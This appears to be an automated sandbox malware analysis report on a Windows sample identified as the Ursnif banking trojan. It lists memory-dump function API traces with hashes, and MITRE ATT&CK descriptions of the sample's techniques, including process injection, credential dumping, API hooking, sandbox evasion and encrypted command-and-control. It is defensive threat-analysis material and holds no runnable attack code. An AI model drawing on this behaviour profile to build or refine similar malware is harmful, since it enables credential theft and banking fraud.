WaitForSingleObject.KERNEL32(00002710,00000000,00000000,?,00000005,?,03748E16,?,00000000,00001000,00000000,00000000,00001000), ref: 0373DDE5
CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,03748E16,?,00000000,00001000,00000000,00000000,00001000), ref: 0373DE07
GetLastError.KERNEL32(?,03748E16,?,00000000,00001000,00000000,00000000,00001000), ref: 0373DE1B

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: File$ErrorLastObjectSingleWait$CloseCreateHandlePointerWritelstrcat
String ID:
API String ID: 3733872353-0
Opcode ID: 0d17295ad6003f9d040c8151dd842e92eb76a2fdb5affbc3e174c9f6a2797f53
Instruction ID: 258c8622c6ea2d45658c498b5c9e27379bd34d5edfb0436c7d07bcb626cc4fd8
Opcode Fuzzy Hash: 0d17295ad6003f9d040c8151dd842e92eb76a2fdb5affbc3e174c9f6a2797f53
Instruction Fuzzy Hash: C9F0C832241308BBDB39AF51EC0DF9A3F69EF16710F108018FA16D91D1EBB551619B55

Uniqueness

Uniqueness Score: -1.00%

Function 0373DF2D, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,03740E89,000000FF,037580C4,?,?,037407D6,0000003A,037580C4), ref: 0373DF49
GetLastError.KERNEL32(?,?,037407D6,0000003A,037580C4,?,?,?,03739C58,00000001,00000000,?), ref: 0373DF54
WaitNamedPipeA.KERNEL32(00002710), ref: 0373DF76
WaitForSingleObject.KERNEL32(00000000,?,?,037407D6,0000003A,037580C4,?,?,?,03739C58,00000001,00000000,?), ref: 0373DF84

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
String ID:
API String ID: 4211439915-0
Opcode ID: 5092a77d67fddbff3b28911739025d1d0c9d0d1496319b09da483c566fba3b95
Instruction ID: 4876c13d7c02b64f7a437d36834e6f4c6681470d5176499c946de7d89fa22c10
Opcode Fuzzy Hash: 5092a77d67fddbff3b28911739025d1d0c9d0d1496319b09da483c566fba3b95
Instruction Fuzzy Hash: 59F0F633A01321FBD3346766AC8DB4BBE26DB023B1F118160F92DE21D0C3B50C80C691

Uniqueness

Uniqueness Score: -1.00%

Function 037362C6, Relevance: 6.0, APIs: 4, Instructions: 39memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,037403A8,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 037362CB
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 037362E0
wsprintfA.USER32 ref: 037362FC

Part of subcall function 0373A09F: memset.NTDLL ref: 0373A0B4
Part of subcall function 0373A09F: lstrlenW.KERNEL32(00000000,00000000,00000000,03754264,00000020,00000000), ref: 0373A0EF
Part of subcall function 0373A09F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,03754264,00000020,00000000), ref: 0373A12D
Part of subcall function 0373A09F: TerminateProcess.KERNEL32(?,000003E5), ref: 0373A16F

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,000000FF), ref: 0373631A

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: HeapProcesslstrlen$AllocateCreateFreeTerminatememsetwsprintf
String ID:
API String ID: 2763937253-0
Opcode ID: be85276cc0a2e956681e9b2041bd25975746bdfb488eaf9db7e1bd46a05ba587
Instruction ID: be36f5d1f90ad0979a06760e16d028b2191712831a90870ed59b6dbd44f9c1aa
Opcode Fuzzy Hash: be85276cc0a2e956681e9b2041bd25975746bdfb488eaf9db7e1bd46a05ba587
Instruction Fuzzy Hash: F4F0E936600314BBD2297729FC0DF6B7AADDFC2B20F254164F505D71D9D6A888428664

Uniqueness

Uniqueness Score: -1.00%

Function 037388C0, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 037388DF

Part of subcall function 0373430A: RtlEnterCriticalSection.NTDLL(03757FE8), ref: 03734316
Part of subcall function 0373430A: CloseHandle.KERNEL32(00000000), ref: 03734324
Part of subcall function 0373430A: RtlLeaveCriticalSection.NTDLL(03757FE8), ref: 03734340

CloseHandle.KERNEL32(?), ref: 037388ED
InterlockedDecrement.KERNEL32(03757FDC), ref: 037388FC

Part of subcall function 03732398: SetEvent.KERNEL32(03758128,03738917), ref: 037323A2
Part of subcall function 03732398: CloseHandle.KERNEL32(03758128), ref: 037323B7
Part of subcall function 03732398: HeapDestroy.KERNEL32(03757FD8), ref: 037323C7

RtlExitUserThread.NTDLL(00000000), ref: 03738918

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
String ID:
API String ID: 1141245775-0
Opcode ID: 952f943af612175a44930ebf412f819a25768cd39488297494b345709904098a
Instruction ID: 78a77016dd409078ed767b2a2104322846915d50bdc00f9f364db503bfe6da60
Opcode Fuzzy Hash: 952f943af612175a44930ebf412f819a25768cd39488297494b345709904098a
Instruction Fuzzy Hash: 84F0C831644308BFD709EB699C09B5E3B3CEB46730B204258F929971C1DBF489028B92

Uniqueness

Uniqueness Score: -1.00%

Function 03750E43, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(037582EC), ref: 03750E4C
Sleep.KERNEL32(0000000A,?,00000000), ref: 03750E56
HeapFree.KERNEL32(00000000,FFFFFFFF,?,00000000), ref: 03750E7E
RtlLeaveCriticalSection.NTDLL(037582EC), ref: 03750E9C

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 00e2226f8182ef86678c3556009f79228bbb1e87651efee6f938d50caceeba9f
Instruction ID: bc63c9b741ed45941da223e2c54635fd39500c61aee9b68e3d45949a5d62b5e4
Opcode Fuzzy Hash: 00e2226f8182ef86678c3556009f79228bbb1e87651efee6f938d50caceeba9f
Instruction Fuzzy Hash: A8F03A72240384AFE72CFB69D888F0A7BA4EB18740F24C454F90AD7195C7B9D895CB15

Uniqueness

Uniqueness Score: -1.00%

Function 0374FB72, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(037582EC), ref: 0374FB7B
Sleep.KERNEL32(0000000A,?,00000000), ref: 0374FB85
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0374FBB3
RtlLeaveCriticalSection.NTDLL(037582EC), ref: 0374FBC8

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 5e38191476050a82c2135130378a3c18a59d806fd3d89363628ffa8157621522
Instruction ID: 463bcb12e111c8934e532bbbaf25aa823fa3edf5e501cbeaa2fc0024e6df0348
Opcode Fuzzy Hash: 5e38191476050a82c2135130378a3c18a59d806fd3d89363628ffa8157621522
Instruction Fuzzy Hash: DBF0DA76200344AFE70CEB65D899F2977A5AB59311B14C059E80AC7264C7B8E851CE15

Uniqueness

Uniqueness Score: -1.00%

Function 0373E683, Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0373E94D

Part of subcall function 03745879: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,0373C8B9,0373C8B9,?,0373E79D,?,0373C8B9,?,?,00000000), ref: 0374589E

Part of subcall function 037468C2: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,0373C8B9,?,?,00000000), ref: 03746936
Part of subcall function 037468C2: memcpy.NTDLL(?,?,?), ref: 0374699D

memcpy.NTDLL(?,?,?,0373C8B9,?,?,?,?,?,0373C8B9,?,?,00000000), ref: 0373E7FC

Part of subcall function 03734E3D: GetModuleHandleA.KERNEL32(?,?,?,0373E8BA,?,?,?,00000000), ref: 03734E7B
Part of subcall function 03734E3D: memcpy.NTDLL(?,0375828C,00000018,?,?,?), ref: 03734EF7

memcpy.NTDLL(?,?,00000018,0373C8B9,?,?,?,?,?,0373C8B9,?,?,00000000), ref: 0373E84A
memcpy.NTDLL(?,0373403E,00000800,?,?,?,00000000), ref: 0373E8CD

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: memcpy$HandleModule$memset
String ID:
API String ID: 2004588391-0
Opcode ID: eeafcc000d6db354d6adf4f171d9fd2ad90577862c0ba3e4a34773cc723a1c54
Instruction ID: 2900a3cb2a63cf163299c8bffc2cafee56fce3a6b67a5ab3db4311264d2b4bf9
Opcode Fuzzy Hash: eeafcc000d6db354d6adf4f171d9fd2ad90577862c0ba3e4a34773cc723a1c54
Instruction Fuzzy Hash: 40A15976E0020AEFDF10DF98C884BEEBBB5FF05304F184469E850AB652D771AA54DB91

Uniqueness

Uniqueness Score: -1.00%

Function 037318F1, Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0373194D
CloseHandle.KERNEL32(?,?,00000100,?), ref: 0373199B
HeapFree.KERNEL32(00000000,?,?,00000094,00000000,0373E3C4,00000000,?,03735F5F,00000000,?,0374E2E9,00000000,?,03739D1D,00000000), ref: 03731CA6
GetLastError.KERNEL32(?,?), ref: 03731F83

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CloseErrorFreeHandleHeapLastmemset
String ID:
API String ID: 2333114656-0
Opcode ID: 36ef3560f74a3825b7fc6d8c848ef96fbcb3dbfa420e641fac2abe49e26aa374
Instruction ID: 7c5e8ef27084ba830a16495295139948ce5dab93516642bcff81088d0e40c1bf
Opcode Fuzzy Hash: 36ef3560f74a3825b7fc6d8c848ef96fbcb3dbfa420e641fac2abe49e26aa374
Instruction Fuzzy Hash: 8851E13A24530AFFDB11FEA0DC44FBF3769AB47350F848112F906AA093DB7199519B62

Uniqueness

Uniqueness Score: -1.00%

Function 0374B909, Relevance: 5.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0374B92F
memcpy.NTDLL ref: 0374B957

Part of subcall function 03740179: RtlNtStatusToDosError.NTDLL(00000000), ref: 037401B1
Part of subcall function 03740179: SetLastError.KERNEL32(00000000), ref: 037401B8

GetLastError.KERNEL32(00000010,00000218,0375285D,00000100,?,00000318,00000008), ref: 0374B96E
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0375285D,00000100), ref: 0374BA51

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Error$Last$Statusmemcpymemset
String ID:
API String ID: 1706616652-0
Opcode ID: fc1f5b5ba57f7fed2a62c4f6f21b5c9f39200e59c7df79c34d3e5782a00b059b
Instruction ID: 25150bfd71b28181c851ca9b399d2fbc4a8db36a48ff2cbb8841198500111252
Opcode Fuzzy Hash: fc1f5b5ba57f7fed2a62c4f6f21b5c9f39200e59c7df79c34d3e5782a00b059b
Instruction Fuzzy Hash: 1D4170B6644301AFD720DF24DC85B9BBBF9EB88310F00892DF999C6251E770E9548B66

Uniqueness

Uniqueness Score: -1.00%

Function 0374754B, Relevance: 5.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,0374E9DE,00000000,?,?,?,0374E9DE,?,?,?,?,?), ref: 03747589
memcpy.NTDLL(?,?,?,?,?,?,?), ref: 03747616
memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 03747654
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 03747662

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: memcpy$FreeLocal
String ID:
API String ID: 2365274387-0
Opcode ID: 6573b8721182e009d8789c9e0b4287c2bf629f8105c31b9d740cd1cf4692767d
Instruction ID: c450e9271449f21abffb391761a4bc17345c995f0f16cee985bd7381f267155b
Opcode Fuzzy Hash: 6573b8721182e009d8789c9e0b4287c2bf629f8105c31b9d740cd1cf4692767d
Instruction Fuzzy Hash: 4A41157680035AAFCF15EF69DC4599B7BA9FF142A0B054025FC14AB210E771EE609BE1

Uniqueness

Uniqueness Score: -1.00%

Function 03742035, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000008,037582C0,00000000,?,?,0373D77B,00000000,037582C0,037582C4,037582C0,?,0373505E,?,?,00000000), ref: 03742041

Part of subcall function 0373ECA1: RtlAllocateHeap.NTDLL(00000000,00000001,03750F65), ref: 0373ECAD

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0373D77B,00000000,037582C0,037582C4,037582C0,?,0373505E,?), ref: 0374209F
lstrcpy.KERNEL32(00000000,00000000), ref: 037420AF
lstrcpy.KERNEL32(00000000,00000000), ref: 037420BB

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: cc1da648db19077fa7f31784ba9ba1daae12e7b3bf8695a13ab206d44fb9b79a
Instruction ID: ee9ba37061af227e3d9e34116b32f4654600ee79a0d287b0fe284facf5f17a3c
Opcode Fuzzy Hash: cc1da648db19077fa7f31784ba9ba1daae12e7b3bf8695a13ab206d44fb9b79a
Instruction Fuzzy Hash: B321C076504359ABCB12AF65C848E9BBFE89F46240B048490FC059F212D775D950D7A0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report FpYf5EGDO9.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Data Obfuscation:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre